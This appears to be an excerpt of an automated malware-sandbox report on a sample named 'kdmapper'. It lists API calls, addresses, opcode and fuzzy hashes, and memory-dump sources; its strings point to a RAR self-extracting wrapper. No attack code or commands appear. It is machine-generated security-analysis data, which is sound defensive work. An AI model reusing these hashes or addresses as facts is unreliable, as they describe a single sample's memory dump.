                                                                                                                                                                                                              • Instruction ID: 9c2b0488e08bd0b1cc31501fb7f36cfeb07b4df4ac29917e0cbf1388d78e8796
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34ec35143e85b9877919d2e87fe64cc716862ac879ac50ed88e00876b671f3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE31F779208345AFC700DFA9C88499BBBF8BF98714F008A1EF995D3210E730D509CBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00E02AF1,00E002FC,00DFFA34), ref: 00E02B08
                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E02B16
                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02B2F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00E02AF1,00E002FC,00DFFA34), ref: 00E02B81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                              • Opcode ID: 89cc42451df5f4f6671e6fbd24c3557e5ca887a1a6e549df5629a437263ba471
                                                                                                                                                                                                              • Instruction ID: a2772586cd826d5278070c60aeb581a5a90e576b5b0d0d0f507bfc2ebf0fe5e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89cc42451df5f4f6671e6fbd24c3557e5ca887a1a6e549df5629a437263ba471
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D01D8321183126DF6252EB57C8DA9A3BDDEB117B8760673EF610751E0EF114C849544
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00E21030,00E04674,00E21030,?,?,00E03F73,00000050,?,00E21030,00000200), ref: 00E097E9
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E0981C
                                                                                                                                                                                                              • _free.LIBCMT ref: 00E09844
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E09851
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E0985D
                                                                                                                                                                                                              • _abort.LIBCMT ref: 00E09863
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                              • Opcode ID: 5489cbc3dfb522bded446af79b9de6f6451402c73e4789717c01bb632f67421b
                                                                                                                                                                                                              • Instruction ID: de5a31537ab36e2677648cccc57d3f9808bf0238007b999f464330eef58f7493
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5489cbc3dfb522bded446af79b9de6f6451402c73e4789717c01bb632f67421b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83F02D351407016BC6193F35BC05A9F1AE98FD2774F25A134F554B23D3EF2088C64135
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DFDC47
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFDC61
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFDC72
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00DFDC7C
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00DFDC86
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DFDC91
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2148572870-0
                                                                                                                                                                                                              • Opcode ID: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
                                                                                                                                                                                                              • Instruction ID: 30728ca825c9c636aa4d585038c9e1e3aa65bb495c8ba14a5fb5e7d969c6a363
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BF03C72A01219BBCB206BA6DC4CDDF7F7EEF46791B148121B60AE2051D674864AC7B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                                                                                                                                                                • Part of subcall function 00DEB92D: _wcsrchr.LIBVCRUNTIME ref: 00DEB944
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DEC197
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DEC1DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                                                                                                                                              • String ID: .exe$.rar$.sfx
                                                                                                                                                                                                              • API String ID: 3513545583-31770016
                                                                                                                                                                                                              • Opcode ID: 4116140745d3967920d8359da0c2bacc443e3d16205237d3cb2b36cd4301a7ce
                                                                                                                                                                                                              • Instruction ID: 6969a285bfbd6e95321885b5a49da3eac966515b6be1369c0f2014822573a4c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4116140745d3967920d8359da0c2bacc443e3d16205237d3cb2b36cd4301a7ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D415B225203D595C731BF359802A7BB7A8EF41754F18690EFAC16B182E7509D83C375
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DEBB27
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00DEA275,?,?,00000800,?,00DEA23A,?,00DE755C), ref: 00DEBBC5
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DEBC3B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                                                              • String ID: UNC$\\?\
                                                                                                                                                                                                              • API String ID: 3341907918-253988292
                                                                                                                                                                                                              • Opcode ID: bf052e9ef2846cc05cabe4c50e755c016111c16aa64970ea643a685859f82442
                                                                                                                                                                                                              • Instruction ID: 689800209c7133554d8664a83537fda8578e2cf354630ccf80866616b982e78f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf052e9ef2846cc05cabe4c50e755c016111c16aa64970ea643a685859f82442
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C741C531404299A6CF21BF72CC01EEB77A9EF41364F248567F554B3151DBB0FA908AB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00DFCD84
                                                                                                                                                                                                                • Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033
                                                                                                                                                                                                                • Part of subcall function 00DF1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DEC116,00000000,.exe,?,?,00000800,?,?,?,00DF8E3C), ref: 00DF1FD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcschr$CompareString
                                                                                                                                                                                                              • String ID: <$HIDE$MAX$MIN
                                                                                                                                                                                                              • API String ID: 69343711-3358265660
                                                                                                                                                                                                              • Opcode ID: 68963d3927e819054715fd07dfc6f8741b3c79ace557361469ae7cc94e657a0c
                                                                                                                                                                                                              • Instruction ID: 6fcd3ce8c3bc9c61f747266d53ed69ea6e001441972a039d98b2e17a3ad8021e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68963d3927e819054715fd07dfc6f8741b3c79ace557361469ae7cc94e657a0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A316B7290020DAADB25DB64CC41AFEB3BDEF14350F45C166FA05E7180EBB09A848FB1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DEB9B8
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00DEB9D6
                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00DEB9E6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                                                                                              • String ID: %c:\
                                                                                                                                                                                                              • API String ID: 525462905-3142399695
                                                                                                                                                                                                              • Opcode ID: 6539dd54c71e341ac519ef4a869c85eb1b6e25e2674fd8f8b00c18849970f74e
                                                                                                                                                                                                              • Instruction ID: 26bdad5f6e687fa88df9cb87996f7f3c613ea70e07d80d32f716bf5ca4a53e06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6539dd54c71e341ac519ef4a869c85eb1b6e25e2674fd8f8b00c18849970f74e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB01456310035169DA317B768C46D7BA7ECEE81370B54541FF584E2082EB20E88082B1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                                                                                                                                                                • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00DFB2BE
                                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00DFB2D6
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00DFB304
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                                                                                              • String ID: GETPASSWORD1$xz
                                                                                                                                                                                                              • API String ID: 445417207-3234807970
                                                                                                                                                                                                              • Opcode ID: be566e1231ba52f4e03b05294cf8204f2d1cf586a991a39893e105bb9b94875b
                                                                                                                                                                                                              • Instruction ID: ecd3385cfc78f0773eb5168d62d89c0231cb6f27448aded9553955cc06ae27fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be566e1231ba52f4e03b05294cf8204f2d1cf586a991a39893e105bb9b94875b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C11E532A40118BADB219AB5DC49FFE376CEB5A760F158022FB85B2080C7A0D9459771
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadBitmapW.USER32(00000065), ref: 00DFB6ED
                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00DFB712
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00DFB744
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00DFB767
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6D5
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA6EC
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: LoadResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA703
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: LockResource.KERNEL32(00000000,?,?,?,00DFB73D,00000066), ref: 00DFA712
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DFB73D,00000066), ref: 00DFA72D
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: GlobalLock.KERNEL32(00000000), ref: 00DFA73E
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DFA762
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DFA7A7
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00DFA7C6
                                                                                                                                                                                                                • Part of subcall function 00DFA6C2: GlobalFree.KERNEL32(00000000), ref: 00DFA7CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                              • String ID: ]
                                                                                                                                                                                                              • API String ID: 1797374341-3352871620
                                                                                                                                                                                                              • Opcode ID: e39d1b469f2b9818c6e155d93dcb698507d555afd8f0fe7c3db44b98d7780f04
                                                                                                                                                                                                              • Instruction ID: ab34aa98d6efad3b99480e65fd6e3f78562b7c91a22fb97177597a38228de6da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e39d1b469f2b9818c6e155d93dcb698507d555afd8f0fe7c3db44b98d7780f04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB012676500619ABC71277789C09A7F7AB9DFC1762F1F8112FB04B7291DF618D0A4271
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                                                                                                                                                                • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00DFD64B
                                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00DFD661
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DFD675
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00DFD684
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                                                                                              • String ID: RENAMEDLG
                                                                                                                                                                                                              • API String ID: 445417207-3299779563
                                                                                                                                                                                                              • Opcode ID: 95c8a03545259b8630ddd2b6c0fd618ea985deaf1794caf7e5b84deca8727049
                                                                                                                                                                                                              • Instruction ID: 5ab2b2ae6b242c13a9f47620680e7b7da916b555bc9b777d7c6d0c64824cc0f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95c8a03545259b8630ddd2b6c0fd618ea985deaf1794caf7e5b84deca8727049
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A301F53368521CBED2105F769D09FB67B5FEB9BB01F228110F345F2090C6A29A098779
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E07E24,00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002), ref: 00E07E93
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E07EA6
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00E07E24,00000000,?,00E07DC4,00000000,00E1C300,0000000C,00E07F1B,00000000,00000002), ref: 00E07EC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                              • Opcode ID: 48093359a79a1eb89f871bb2872b837b88ee463ec2ebaa40e6b62124f52016dd
                                                                                                                                                                                                              • Instruction ID: 7d7a4c6ed536d47deb5ed90a152bb8982337c4a76228c8745f6032398175daaa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48093359a79a1eb89f871bb2872b837b88ee463ec2ebaa40e6b62124f52016dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F06831A01208BFDB119FA1DC09BDEBFB5EF44715F0080A9F805B22A0DB749E85CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
                                                                                                                                                                                                                • Part of subcall function 00DF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DEF2E4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00E281C8,CryptUnprotectMemory), ref: 00DEF2F4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
